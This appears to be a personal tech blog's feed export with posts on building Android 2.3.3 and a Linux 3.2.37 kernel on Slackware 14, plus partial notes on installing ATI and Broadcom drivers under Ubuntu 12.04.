tag:blogger.com,1999:blog-11911789333702508262024-03-17T20:02:46.863-07:00MicroMikeThis blog is all about computer science, especially the information security. Leave a comment to let me know how to let this blogger get betterAnonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.comBlogger29125tag:blogger.com,1999:blog-1191178933370250826.post-57939818297604606972013-01-21T02:05:00.000-08:002014-03-08T08:11:09.824-08:00Compile Android 2.3.3 in Slackware 14<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;"><b>I. Introduction:</b></span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">Recently
I decided to change my linux distro from ubuntu to slackware. The
installation process is nice and smooth. After I install slackware, I
decided to download the android 2.3.3 source and compile myself. I have
done it before in ubuntu 10.04, so I told to myself how hard could it
be. However I was wrong, compiling android in slackware 14 is incredibly
annoying. Most of the problems are caused by gcc and perl version
mismatch. Some people might say, just downgrade/upgrade your gcc/perl
version and it should be fine. I know that, but changing gcc/perl
version in your system might cause some problems and I don't want to
take that risk. (btw, recompile gcc is very time consuming in my
computer. Hardware sucks) </span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">Because
the above reason, I decide to compile the android 2.3.3 without
downgrade any tools and also to write the whole process down to remind
myself how I do it.</span></div>
<div>
<br clear="none" /></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;"><b>II. Environment:</b></span></div>
<div>
<hr />
</div>
<div>
<ul>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">Linux Distro : Slackware 14 x86_64( with multilib support )</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">gcc version : 4.7.1</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">make version : 3.82</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">perl version : 5.16</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">git version : 1.71</span></li>
<li><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">python version : 2.73</span></li>
</ul>
<div>
<hr />
</div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">Just a clean install of slackware 14. </span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">As for multilib support just check out <a data-mce-href="http://alien.slackbook.org/dokuwiki/doku.php?id=slackware:multilib" href="http://alien.slackbook.org/dokuwiki/doku.php?id=slackware:multilib" shape="rect" target="_blank">Alien BOB wiki</a> and follow the instructions that wiki mentioned. </span></div>
<div>
<i><b><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">P.S you should at least have >2GB of RAM or the building process may failed. </span></b></i></div>
<div>
<br clear="none" /></div>
<div>
<br clear="none" /></div>
</div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;"><b>III. Compiling Steps:</b></span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">This
post is mostly focus on how to solve the version mismatch problems;
therefore, I will not cover how I setup the build environment in this
post. (Most libraries that required to build android are already
installed by the Slackware 14 clean install)</span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">After
you follow the ASOP instructions and install all the necessary
packages, it is time to type make command. (I highly recommend that use
'make -j1' instead of 'make -j8' )</span></div>
<div>
<br clear="none" /></div>
<div>
<b><span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">1. GCC version mismatch:</span></b></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">The
following is an example of how this kind of error message look like and
the general solutions of how to solve this kind of problems. Figure 1
shows how this kind of error message looks like. There are two ways to
solve this kind of problem. </span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">The
first one is add "this->" in front of all the variables that appear
in the error message. However, in the entire building process, you will
be very annoying adding this pointer in front of all the errors. </span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">The
second method is to add "-fpermissive" flag in the makefile. More
precisely add "-fpermissive" to LOCAL_CFLAGS in Android.mk. This method
is more reasonable. </span></div>
<div>
<div>
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">During the whole building process, there are several Android.mk files that need to be modified (adding "-fpermissive" flag)</span></div>
<div>
<br clear="none" /></div>
<div>
<hr />
</div>
<div>
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">frameworks/base/tools/aapt/Android.mk</span></div>
<div>
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">frameworks/base/libs/utils/Android.mk</span><br />
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">external/srec/tools/grxmlcompile/Android.mk</span><br />
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">external/srec/tools/thirdparty/OpenFst/fst/lib/Android.mk</span><br />
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">external/srec/tools/make_cfst/Android.mk</span><br />
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">external/v8/Android.mksnapshot.mk</span><br />
<hr />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTO9LZpp0cacLUmPOsjhAFdXMor2_uYn5EwHp_mbI3q35oVY4PZkJFAP_9FKyUNRGStJO7lIfMDCH5s6Gfvx-Cb-EVoGz3alrNiFupofyYLAYliVRcIhTX3PKfgAyc0mvf_ZAla5HGBt8/s1600/android_first_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTO9LZpp0cacLUmPOsjhAFdXMor2_uYn5EwHp_mbI3q35oVY4PZkJFAP_9FKyUNRGStJO7lIfMDCH5s6Gfvx-Cb-EVoGz3alrNiFupofyYLAYliVRcIhTX3PKfgAyc0mvf_ZAla5HGBt8/s1600/android_first_1.png" /></a></div>
<pre><span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"> </span></pre>
</div>
</div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">[figure 1] gcc version mismatch error message</span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE-vBaWhFmPe8lUJMPzylDjgGwZ9WOCAumn6heP3E7bRl4H9yFnUUYB7hwKGSWrFrSzbPV7DODd7kDOSt10_VHEZqzrg7f0fWGgAkjXTTkH1bfpri_Yt99P69au3FMupHMGBAPwIJ0T-4/s1600/Android_first_solve.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE-vBaWhFmPe8lUJMPzylDjgGwZ9WOCAumn6heP3E7bRl4H9yFnUUYB7hwKGSWrFrSzbPV7DODd7kDOSt10_VHEZqzrg7f0fWGgAkjXTTkH1bfpri_Yt99P69au3FMupHMGBAPwIJ0T-4/s1600/Android_first_solve.png" /></a></div>
</div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<span data-mce-style="font-family: 'times new roman', times;" style="font-family: 'times new roman', times;">[Figure 2] Add "-fpermissive" after the LOCAL_CFLAGS in the Android.mk</span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<br /></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<b><span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">2. perl Switch module problem:</span></b></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">Switch.pm
is deprecated in perl 5.16, therefore the solution is simple, patch the
"external/webkit/WebCore/dom/make_names.pl". Figure 4,5,6 show some
modification of this file. </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Eh7vJLlsglyscM6k5BQrhFnz7_vDQGyedYJPm-RuiF9yd31WGvWq0lTyrOZHvp3ml5OzrzpMTFGfpLvxdckUj0yTVDJyWd6C4DYdHnxe_0Q3yGTLphUkeNRsY_nuT8tZMAXKImkJVN8/s1600/Android_second.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Eh7vJLlsglyscM6k5BQrhFnz7_vDQGyedYJPm-RuiF9yd31WGvWq0lTyrOZHvp3ml5OzrzpMTFGfpLvxdckUj0yTVDJyWd6C4DYdHnxe_0Q3yGTLphUkeNRsY_nuT8tZMAXKImkJVN8/s1600/Android_second.png" /></a></div>
</div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">[Figure 3] Can't locate Switch.pm</span></div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-SAcL2dOw8U7QF-TQlDp4NARcUZjeBA4b6KW5gy13_lE1nR-PARwh7bD56ayARjYTx0a-0EsGbgA0ovyvw65Xsz-qMouh5o7TWzv5Ev2K-2K1lv_m_DSrMZGAMYedukBoHPdQ9h7x1Q/s1600/Android_second_patch1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-SAcL2dOw8U7QF-TQlDp4NARcUZjeBA4b6KW5gy13_lE1nR-PARwh7bD56ayARjYTx0a-0EsGbgA0ovyvw65Xsz-qMouh5o7TWzv5Ev2K-2K1lv_m_DSrMZGAMYedukBoHPdQ9h7x1Q/s1600/Android_second_patch1.png" /></a></div>
<span style="font-family: 'times new roman', times;">[Figure 4] comment use Switch</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimoLzQzOFFVk5EMWOlkRssHX4M7IPHmiHKTFSnEV1mb5C8XUXklRWnpnHMNZsDPoMNwE0noAcP0De9DQK7kJ3IKGn3v0SJm3ScEhu9VYOmTpoxj3C9lcDpSXpdljuBzjHinFPsAJMr3fw/s1600/Android_second_pathc2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimoLzQzOFFVk5EMWOlkRssHX4M7IPHmiHKTFSnEV1mb5C8XUXklRWnpnHMNZsDPoMNwE0noAcP0De9DQK7kJ3IKGn3v0SJm3ScEhu9VYOmTpoxj3C9lcDpSXpdljuBzjHinFPsAJMr3fw/s1600/Android_second_pathc2.png" /></a></div>
<span style="font-family: 'times new roman', times;">[Figure 5] use if else instead of switch case</span></div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjakF30hfStU-6Qh62QAxqvXO2bACnR5JZcCOkJLzvCUuyTUDT6XTTNEPMzJI0nfipxbNXDQIdHpRDInodyUt4OYNv2p119yW7nZQH9d1t-D_GkfrIp2GdS-NJ9oS_W3dueZM4lRMSkGLE/s1600/Android_second_pathc3-2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjakF30hfStU-6Qh62QAxqvXO2bACnR5JZcCOkJLzvCUuyTUDT6XTTNEPMzJI0nfipxbNXDQIdHpRDInodyUt4OYNv2p119yW7nZQH9d1t-D_GkfrIp2GdS-NJ9oS_W3dueZM4lRMSkGLE/s640/Android_second_pathc3-2.png" height="84" width="640" /></a></div>
<br clear="none" /></div>
<div data-mce-style="text-align: center;" style="text-align: center;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">[Figure 6] delete the "-P" flag from preprocessor</span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<b><span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">IV. Conclusion:</span></b></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">After the above steps, the building process should be fine and you can see the image file in the out directory.</span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;">I also make a diff file which you can download from here:</span><span data-mce-style="font-family: 'times new roman', times; font-size: medium; line-height: 1.428571em;" style="font-family: 'times new roman', times; font-size: small; line-height: 1.428571em;"> </span><span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"><span data-mce-style="line-height: 1.428571em;" style="line-height: 1.428571em;"><a data-mce-href="http://pastebin.com/RCfB5irk" href="http://pastebin.com/RCfB5irk" shape="rect" target="_blank">http://pastebin.com/RCfB5irk</a></span></span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"><span data-mce-style="line-height: 1.428571em;" style="line-height: 1.428571em;">Just download the file and type:</span></span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"><span data-mce-style="line-height: 1.428571em;" style="line-height: 1.428571em;">patch -p1 < patch_file_name.patch</span></span></div>
<div data-mce-style="text-align: left;" style="text-align: left;">
<span data-mce-style="font-family: 'times new roman', times; font-size: medium;" style="font-family: 'times new roman', times; font-size: small;"><span data-mce-style="line-height: 1.428571em;" style="line-height: 1.428571em;">Enjoy :)</span></span></div>
<div>
<br clear="none" /></div>
Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-68691699545895592262013-01-21T02:02:00.003-08:002013-01-21T05:25:03.705-08:00Linux Kernel 1: How to Compile Linux Kernel<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><strong>I. Introduction:</strong></span></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">This
post is the first post for linux kernel hacking. Before you can dig
into linux kernel source you should first learn how to build a kernel
yourself.</span></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">There
are many distributions out there, and I prefer to use Slackware 14,
gentoo or debian (not dibian based distro such as ubuntu, mint). The
reason I recommend to use these two distro is because that most modern
distributions have changed so many linux codes that may confused you
while your are tracing linux code. </span></div>
<div>
<br clear="none" /></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><strong>II. Environment:</strong></span></div>
<ul>
<li><span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Linux Distro: Slackware 14 x86_64</span></li>
<li><span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">kernel version: 3.2.37</span></li>
<li><span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">gcc version: 4.7.1</span></li>
</ul>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><strong>III. Contents:</strong></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>1. pre-requirement:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">The first thing you should do is download the kernel source that you want to build. The kernel source file can be found in : <a data-mce-href="http://www.kernel.org/pub/linux/kernel" href="http://www.kernel.org/pub/linux/kernel" shape="rect" target="_blank">http://www.kernel.org/pub/linux/kernel/.</a></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">In
my case, "linux-3.2.37.tar.bz2". Just extract the file and put it into
the directory that you want. I put the source code in "$HOME/kernel/".</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>2. config: </strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Before
building the kernel, you have to config it first. type "make help" and
you can see a list of options. In this part, we just focus on the
config sections.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">The following are some options that are commonly used.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
</div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<br /></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">config - Update current config utilising a line-oriented program</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">menuconfig - Update current config utilising a menu based program</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">xconfig - Update current config utilising a QT based front-end</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">gconfig - Update current config utilising a GTK based front-end</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">oldconfig - Update current config utilising a provided .config as base</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">localmodconfig - Update current config disabling modules not loaded</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">localyesconfig - Update current config converting local mods to core</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br clear="none" />
<hr />
</div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">The
description is very self-explained therefore I'm not going to explain
it. Just a quick note, if you prefer the GUI interface, type "make
xconfig/gconfig" which will give you gui interface to config the kernel.
In my case I use "make localmodconfig" which will set the config file
according to your system modules.</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><br /></span>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">------------------------------------[update]---------------------------------------------------------</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"> you can also use "gcat /proc/config.gz > .config" if your previous kernel has enable the IKCONFIG and IKCONFIG_PROC flag. This will copy the previous kernel configuration to your current kernel source. After you finished the above command you can still type "make oldconfig" if you are using a newer kernel. (The newer kernel may have some new features )</span><br />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Thank you <a class="g-profile" href="http://plus.google.com/115790893258766250092" target="_blank">+Eric Garland</a>. :)</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>3. build the kernel:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">If
this is the first time you compile this kernel Type "make all -j8" to
compile the kernel. The "make help" output tell us that the make install
will build the target marked * and the default one is "vmlinuz" and
"modules". </span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">However,
if u have compiled the kernel before and there is no new featured that
is added in the config file.You can type "make vmlinuz -j8" instead. It
will only build the vmlinuz and will not build the modules. </span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">If you have add a new modules or edit the modules source code you can type "make modules -j8" to only compile the linux modules.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>P.S Compiling the linux kernel may take some time according to your hardware. (get a cup of coffee or watch a movie :P)</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong> 4. Install the modules:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">If
this is the first time you build the linux kernel: type "sudo make
modules_install". If your haven't modify any kernel modules or add a new
one in the config file, this step can be skiped.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>5. Install the kernel:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Instead of typing "make install" I prefer using the following command.</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><br clear="none" /></span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">sudo cp arch/x86_64/boot/bzimage /boot/vmlinuz-3.2.37</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">sudo mkinitrd -c -k 3.2.37 -m ext4 -f ext4 -r /dev/sdaN -o /boot/initrd-3.2.37.img</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><br clear="none" /></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">More detailed about mkinitrd command, type "man mkinitrd" or check out this link: <a href="http://www.blogger.com/blogger.g?blogID=1191178933370250826" shape="rect">http://mirrors.slackware.com/slackware/slackware-11.0/extra/linux-2.6.17.13/README.initrd</a></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>6. Update your bootloader:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">Since
I'm using slackware and the default bootloader of slackware is lilo, so
I have to edit the /etc/lilo.conf. After modified the /etc/lilo.conf
type "sudo lilo".</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><em><strong>7. Command Walk through:</strong></em></span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"> <span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">// if this is the first time you compile the kernel</span></span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make mrproper; </span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">// if this is the first time
you compile the kernel or want to add some new features to your
kernel.</span> </span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make
localmodconfig/menuconfig/xconfig/gconfig; </span></div>
<div data-mce-style="margin-left: 90px;" style="margin-left: 90px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make all && make modules_install; // if this is the first time you compile the kernel or adding new stuff to the</span></div>
<div data-mce-style="margin-left: 90px;" style="margin-left: 90px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make vmlinuz; // if you just change the kernel source</span></div>
<div data-mce-style="margin-left: 90px;" style="margin-left: 90px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">make modules && make modules_install; // if you have add a new module in config file or modify the module source code</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">cp arch/x86_64/boot/bzimage /boot/vmlinux-3.2.37</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">mkinitrd -c -k 3.2.37 -m ext4 -f ext4 -r /dev/sda2</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">-----update your bootloader----</span></div>
<div data-mce-style="margin-left: 60px;" style="margin-left: 60px;">
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">echo "done";</span></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<hr />
<br clear="none" /></div>
<div data-mce-style="margin-left: 30px;" style="margin-left: 30px;">
<br /></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;"><strong>IV Conclusion:</strong></span></div>
<div>
<span data-mce-style="font-family: times new roman,times;" style="font-family: times new roman,times;">This
is basically how to compile a linux kernel. I will talk about some more
configuration and some tools to help you trace the linux code. Happy
Hacking.</span></div>
Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-85162736476681526382012-10-03T00:07:00.001-07:002014-03-07T06:32:31.278-08:00Ubuntu 12.04 notes.Ubuntu 12.04 has been released for a while. I recently installed this version and almost everything works great except the video and wireless driver. I have google for a very long time and viewed many threads to solve these two problems. Therefore, this post is just to remind me how I solved this problem.<br />
<h3>
Video Drivers:</h3>
<div>
My notebook's graphic card is ati radeon hd 4300. If you want to check what graphic card your computer is using just type:</div>
<div>
<hr />
<code>lspci -vnn | grep VGA</code>
<br />
<hr />
<div>
and it will show you the information that you need.</div>
<div>
Actually, there are many ways to install the graphic drivers. The following is just how I set my video drivers.</div>
<div>
First make sure you haven't installed an old fglrx drivers. If you do, simply type:</div>
<div>
<hr />
<code>sudo apt-get remove --purge fglrx* fglrx_* fglrx-amdcccle* fglrx-dev*</code><br />
<hr />
</div>
<div>
this command will remove the fglrx driver that your system is currently using.</div>
<div>
After remove the old drivers, download the binary file from the amd support web site:</div>
<div>
<a href="http://support.amd.com/us/Pages/AMDSupportHub.aspx">http://support.amd.com/us/Pages/AMDSupportHub.aspx</a>
</div>
In my case, the binary file I need to download is as follow.
<a href="http://support.amd.com/us/gpudownload/windows/previous/12/Pages/radeon_linux.aspx?os=Linux%20x86&rev=12.4">http://support.amd.com/us/gpudownload/windows/previous/12/Pages/radeon_linux.aspx?os=Linux%20x86&rev=12.4</a>
<br />
<div>
After download the binary file type:</div>
<hr />
<div>
<code>chmod +x amd-driver-installer-12-4-x86.x86_64.run</code><br />
<code>./amd-driver-installer-12-4-x86.x86_64.run --buildpkg Ubuntu/precise</code><br />
<code>sudo dpkg -i *.deb</code></div>
<hr />
That's it. Reboot your system and the fglrx should installed properly.<br />
More detailed, check the following two reference websites.<br />
<a href="https://help.ubuntu.com/community/BinaryDriverHowto/ATI">https://help.ubuntu.com/community/BinaryDriverHowto/AT</a><a href="https://help.ubuntu.com/community/BinaryDriverHowto/ATI" style="background-color: white;">I</a><br />
<a href="http://askubuntu.com/questions/124292/what-is-the-correct-way-to-install-ati-catalyst-video-drivers">http://askubuntu.com/questions/124292/what-is-the-correct-way-to-install-ati-catalyst-video-drivers</a><br />
<h3>
Wireless Drivers:</h3>
<div>
My notebook's wireless NIC is Broadcom BCM 4312. Again, if you want to know what chipset your device is using type:</div>
<div>
<hr />
<code>
lspci -vnn | grep Network
</code>
<br />
<hr />
</div>
And it will print out the information you need.
